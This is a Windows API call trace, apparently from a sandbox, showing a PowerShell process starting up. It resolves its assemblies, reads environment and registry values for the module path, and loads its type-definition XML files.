	[0129.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e4e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.661] GetLastError () returned 0x7a
	[0129.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.661] GetLastError () returned 0x7a
	[0129.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.661] GetLastError () returned 0x7a
	[0129.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.661] GetLastError () returned 0x7a
	[0130.532] SetConsoleCtrlHandler (HandlerRoutine=0x287384a, Add=1) returned 1
	[0130.532] GetLastError () returned 0x7a
	[0131.514] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0131.514] GetLastError () returned 0xcb
	[0132.077] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1e0
	[0132.077] GetLastError () returned 0x0
	[0132.212] CoCreateGuid (in: pguid=0x10e9c8 | out: pguid=0x10e9c8*(Data1=0x95337e56, Data2=0xf4a8, Data3=0x410d, Data4=([0]=0x92, [1]=0x1b, [2]=0x3a, [3]=0x72, [4]=0x1e, [5]=0xea, [6]=0x7f, [7]=0x37))) returned 0x0
	[0134.694] WinSqmIsOptedIn () returned 0x0
	[0134.695] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.695] GetLastError () returned 0xcb
	[0134.914] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.914] GetLastError () returned 0xcb
	[0134.915] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.915] GetLastError () returned 0xcb
	[0134.918] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.918] GetLastError () returned 0xcb
	[0134.920] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.920] GetLastError () returned 0xcb
	[0134.938] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.938] GetLastError () returned 0xcb
	[0134.940] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.940] GetLastError () returned 0xcb
	[0135.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0135.095] GetLastError () returned 0xcb
	[0135.106] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0135.106] GetLastError () returned 0xcb
	[0135.486] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0135.486] GetLastError () returned 0xcb
	[0135.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0135.490] GetLastError () returned 0xcb
	[0135.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0135.491] GetLastError () returned 0xcb
	[0145.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.299] GetLastError () returned 0xcb
	[0145.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.299] GetLastError () returned 0xcb
	[0145.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.300] GetLastError () returned 0xcb
	[0145.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.300] GetLastError () returned 0xcb
	[0146.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.022] GetLastError () returned 0x3
	[0146.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.022] GetLastError () returned 0x3
	[0146.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.022] GetLastError () returned 0x3
	[0146.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.022] GetLastError () returned 0x3
	[0146.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.022] GetLastError () returned 0x3
	[0146.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.022] GetLastError () returned 0x3
	[0146.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.022] GetLastError () returned 0x3
	[0146.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.022] GetLastError () returned 0x3
	[0146.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.022] GetLastError () returned 0x3
	[0146.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.023] GetLastError () returned 0x3
	[0146.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.023] GetLastError () returned 0x3
	[0146.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.023] GetLastError () returned 0x3
	[0146.220] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0146.221] GetLastError () returned 0x3
	[0146.439] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x584bc0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0146.439] GetLastError () returned 0x3
	[0146.439] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e7e0 | out: phkResult=0x10e7e0*=0x1e4) returned 0x0
	[0146.439] RegQueryValueExW (in: hKey=0x1e4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x10e824, lpData=0x0, lpcbData=0x10e820*=0x0 | out: lpType=0x10e824*=0x2, lpData=0x0, lpcbData=0x10e820*=0x6c) returned 0x0
	[0146.719] RegQueryValueExW (in: hKey=0x1e4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x10e824, lpData=0x584bc0, lpcbData=0x10e820*=0x6c | out: lpType=0x10e824*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x10e820*=0x6c) returned 0x0
	[0146.719] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x584bc0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0146.719] GetLastError () returned 0x3
	[0146.719] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x584bc0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0146.719] GetLastError () returned 0x3
	[0146.720] RegCloseKey (hKey=0x1e4) returned 0x0
	[0146.720] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x584bc0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0146.720] GetLastError () returned 0x3
	[0146.720] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e7e0 | out: phkResult=0x10e7e0*=0x1e4) returned 0x0
	[0146.720] RegQueryValueExW (in: hKey=0x1e4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x10e824, lpData=0x0, lpcbData=0x10e820*=0x0 | out: lpType=0x10e824*=0x0, lpData=0x0, lpcbData=0x10e820*=0x0) returned 0x2
	[0146.721] RegCloseKey (hKey=0x1e4) returned 0x0
	[0146.729] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x584bc0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0146.730] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x10e348, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0146.731] GetLastError () returned 0x3f0
	[0146.732] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0146.732] GetLastError () returned 0x3f0
	[0146.870] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.870] GetLastError () returned 0xcb
	[0146.871] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.871] GetLastError () returned 0xcb
	[0147.144] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.144] GetLastError () returned 0xcb
	[0147.144] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.144] GetLastError () returned 0xcb
	[0147.153] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e760 | out: phkResult=0x10e760*=0x348) returned 0x0
	[0147.316] RegQueryValueExW (in: hKey=0x348, lpValueName="path", lpReserved=0x0, lpType=0x10e7c8, lpData=0x0, lpcbData=0x10e7c4*=0x0 | out: lpType=0x10e7c8*=0x1, lpData=0x0, lpcbData=0x10e7c4*=0x74) returned 0x0
	[0147.317] RegQueryValueExW (in: hKey=0x348, lpValueName="path", lpReserved=0x0, lpType=0x10e7a8, lpData=0x0, lpcbData=0x10e7a4*=0x0 | out: lpType=0x10e7a8*=0x1, lpData=0x0, lpcbData=0x10e7a4*=0x74) returned 0x0
	[0147.318] RegQueryValueExW (in: hKey=0x348, lpValueName="path", lpReserved=0x0, lpType=0x10e7a8, lpData=0x584bc0, lpcbData=0x10e7a4*=0x74 | out: lpType=0x10e7a8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x10e7a4*=0x74) returned 0x0
	[0147.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x10e328, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0147.318] GetLastError () returned 0xcb
	[0147.318] SetErrorMode (uMode=0x1) returned 0x1
	[0147.318] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x10e7a8 | out: lpFileInformation=0x10e7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0147.318] GetLastError () returned 0xcb
	[0147.318] SetErrorMode (uMode=0x1) returned 0x1
	[0147.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e31c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0147.322] GetLastError () returned 0xcb
	[0147.322] SetErrorMode (uMode=0x1) returned 0x1
	[0147.322] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10e79c | out: lpFileInformation=0x10e79c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0147.322] GetLastError () returned 0xcb
	[0147.322] SetErrorMode (uMode=0x1) returned 0x1
	[0147.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e31c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0147.326] GetLastError () returned 0xcb
	[0147.326] SetErrorMode (uMode=0x1) returned 0x1
	[0147.326] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10e79c | out: lpFileInformation=0x10e79c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0147.326] GetLastError () returned 0xcb
	[0147.326] SetErrorMode (uMode=0x1) returned 0x1
	[0147.458] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.458] GetLastError () returned 0xcb
	[0147.460] GetACP () returned 0x4e4
	[0148.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0148.048] GetLastError () returned 0xcb
	[0148.048] SetErrorMode (uMode=0x1) returned 0x1
	[0148.051] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c
	[0148.051] GetLastError () returned 0x0
	[0148.052] GetFileType (hFile=0x34c) returned 0x1
	[0148.052] SetErrorMode (uMode=0x1) returned 0x1
	[0148.052] GetFileType (hFile=0x34c) returned 0x1
	[0148.055] ReadFile (in: hFile=0x34c, lpBuffer=0x29bb494, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x29bb494*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0148.091] GetLastError () returned 0x0
	[0148.092] ReadFile (in: hFile=0x34c, lpBuffer=0x29bb494, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x29bb494*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0148.093] GetLastError () returned 0x0
	[0148.093] ReadFile (in: hFile=0x34c, lpBuffer=0x29bb494, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x29bb494*, lpNumberOfBytesRead=0x10e714*=0x1000, lpOverlapped=0x0) returned 1
	[0148.093] GetLastError () returned 0x0
	[0148.093] ReadFile (in: hFile=0x34c, lpBuffer=0x29bb494, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x29bb494*, lpNumberOfBytesRead=0x10e714*=0xcf3, lpOverlapped=0x0) returned 1
	[0148.093] GetLastError () returned 0x0
	[0148.094] ReadFile (in: hFile=0x34c, lpBuffer=0x29ba927, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x29ba927*, lpNumberOfBytesRead=0x10e714*=0x0, lpOverlapped=0x0) returned 1
	[0148.094] GetLastError () returned 0x0
	[0148.094] ReadFile (in: hFile=0x34c, lpBuffer=0x29bb494, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e714, lpOverlapped=0x0 | out: lpBuffer=0x29bb494*, lpNumberOfBytesRead=0x10e714*=0x0, lpOverlapped=0x0) returned 1
	[0148.094] GetLastError () returned 0x0
	[0148.094] CloseHandle (hObject=0x34c) returned 1
	[0148.094] GetLastError () returned 0x0
	[0148.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e274, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0148.096] GetLastError () returned 0x0
	[0148.096] SetErrorMode (uMode=0x1) returned 0x1
	[0148.096] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x29cc808 | out: lpFileInformation=0x29cc808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0148.096] GetLastError () returned 0x0
	[0148.096] SetErrorMode (uMode=0x1) returned 0x1
	[0148.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0148.328] GetLastError () returned 0x0
	[0148.328] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e698 | out: phkResult=0x10e698*=0x34c) returned 0x0
	[0148.328] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e6e0, lpData=0x0, lpcbData=0x10e6dc*=0x0 | out: lpType=0x10e6e0*=0x1, lpData=0x0, lpcbData=0x10e6dc*=0x56) returned 0x0
	[0148.329] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e6e0, lpData=0x584bc0, lpcbData=0x10e6dc*=0x56 | out: lpType=0x10e6e0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e6dc*=0x56) returned 0x0
	[0148.330] RegCloseKey (hKey=0x34c) returned 0x0
	[0148.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0148.330] GetLastError () returned 0x0
	[0148.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0148.330] GetLastError () returned 0x0
